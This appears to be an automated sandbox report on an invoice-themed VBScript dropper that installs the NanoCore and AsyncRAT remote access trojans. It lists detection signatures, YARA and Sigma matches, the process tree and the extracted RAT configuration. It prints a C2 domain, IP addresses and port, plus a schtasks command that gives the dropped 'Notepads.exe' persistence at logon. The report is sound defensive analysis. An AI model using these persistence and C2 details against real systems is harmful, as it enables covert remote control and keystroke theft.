Analysis Report Invoice No F1019855_PDF.vbs

Overview

General Information

Sample Name: Invoice No F1019855_PDF.vbs
Analysis ID: 404165
MD5: ce4dcec84bfeba49404fa70f5d137645
SHA1: c31021953c59af126d0095bea70c26ca02a2d954
SHA256: ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
Tags: NanoCore RAT vbs

Detection

Nanocore AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • wscript.exe (PID: 6428 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ame.exe (PID: 6592 cmdline: 'C:\Users\user\AppData\Local\Temp\ame.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
      • wscript.exe (PID: 6700 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
        • schtasks.exe (PID: 5544 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Notepads.exe (PID: 5444 cmdline: 'C:\Users\user\AppData\Roaming\Notepads.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
    • fi.exe (PID: 6616 cmdline: 'C:\Users\user\AppData\Local\Temp\fi.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • dhcpmon.exe (PID: 6952 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • Notepads.exe (PID: 2152 cmdline: C:\Users\user\AppData\Roaming\Notepads.exe MD5: F7F64EC1756119F19D52FB140E22382F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\fi.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Local\Temp\fi.exe | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\AppData\Local\Temp\fi.exe | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
C:\Users\user\AppData\Local\Temp\fi.exe | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1014d:$x1: NanoCore.ClientPluginHost
  • 0x1018a:$x2: IClientNetworkHost
  • 0x13cbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfeb5:$a: NanoCore
  • 0xfec5:$a: NanoCore
  • 0x100f9:$a: NanoCore
  • 0x1010d:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0xff14:$b: ClientPlugin
  • 0x10116:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x1003b:$c: ProjectData
  • 0x10a42:$d: DESCrypto
  • 0x1840e:$e: KeepAlive
  • 0x163fc:$g: LogClientMessage
  • 0x125f7:$i: get_Connected
  • 0x10d78:$j: #=q
  • 0x10da8:$j: #=q
  • 0x10dc4:$j: #=q
  • 0x10df4:$j: #=q
  • 0x10e10:$j: #=q
  • 0x10e2c:$j: #=q
  • 0x10e5c:$j: #=q
  • 0x10e78:$j: #=q
00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1021d:$x1: NanoCore.ClientPluginHost
  • 0x1025a:$x2: IClientNetworkHost
  • 0x13d8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.dhcpmon.exe.424e434.4.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xd9ad:$x1: NanoCore.ClientPluginHost
  • 0xd9da:$x2: IClientNetworkHost
7.2.dhcpmon.exe.424e434.4.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xd9ad:$x2: NanoCore.ClientPluginHost
  • 0xea88:$s4: PipeCreated
  • 0xd9c7:$s5: IClientLoggingHost
7.2.dhcpmon.exe.424e434.4.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
3.0.ame.exe.500000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
1.2.wscript.exe.16c170d0090.5.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

            Sigma Overview

            AV Detection:

            Sigma detected: NanoCore
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud:

            Sigma detected: NanoCore
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary:

            Sigma detected: WScript or CScript Dropper
            Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community, Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ame.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ame.exe, ParentProcessId: 6592, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , ProcessId: 6700

            Stealing of Sensitive Information:

            Sigma detected: NanoCore
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality:

            Sigma detected: NanoCore
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Signature Overview

            AV Detection:

            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Notepads.exe, Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\ame.exe, Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Found malware configuration
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Virustotal: Detection: 81%
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Metadefender: Detection: 90%
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, ReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Local\Temp\ame.exe, Virustotal: Detection: 62%
            Source: C:\Users\user\AppData\Local\Temp\ame.exe, ReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Virustotal: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Metadefender: Detection: 90%
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, ReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Roaming\Notepads.exe, ReversingLabs: Detection: 75%
            Multi AV Scanner detection for submitted file
            Source: Invoice No F1019855_PDF.vbs, Virustotal: Detection: 29%
            Source: Invoice No F1019855_PDF.vbs, ReversingLabs: Detection: 23%
            Yara detected Nanocore RAT
            Source: Yara match, File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara match, File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Notepads.exe, Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ame.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Joe Sandbox ML: detected
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 3.0.ame.exe.500000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 30.0.Notepads.exe.f40000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.2.fi.exe.4f70000.10.unpack, Avira: Label: TR/NanoCore.fadte
            Source: 4.0.fi.exe.40000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.2.fi.exe.40000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Networking:

            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs:
            Source: Malware configuration extractor, URLs: sys2021.linkpc.net
            Connects to many ports of the same IP (likely port scanning)
            Source: global traffic, TCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940
            Potential malicious VBS script found (has network functionality)
            Source: Initial file: zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx
            Source: global traffic, TCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
            Source: global traffic, TCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940
            Source: Joe Sandbox View, IP Address: 79.137.109.121
            Source: unknown, TCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknown, DNS traffic detected: queries for: sys2021.linkpc.net
            Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected AsyncRAT
            Source: Yara match, File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara match, File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match, File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara match, File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Contains functionality to log keystrokes (.Net Source)
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs, .Net Code: KeyboardLayout
            Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Binary or memory string: RegisterRawInputDevices

            E-Banking Fraud:

            Yara detected Nanocore RAT
            Source: Yara match, File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara match, File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Code function: 4_2_0234131A NtQuerySystemInformation
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, Code function: 4_2_023412DF NtQuerySystemInformation
            Source: Joe Sandbox View, Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Invoice No F1019855_PDF.vbs, Initial sample: Strings found which are bigger than 50
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY, Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY, Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY, Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED, Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED, Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED, Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED, Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
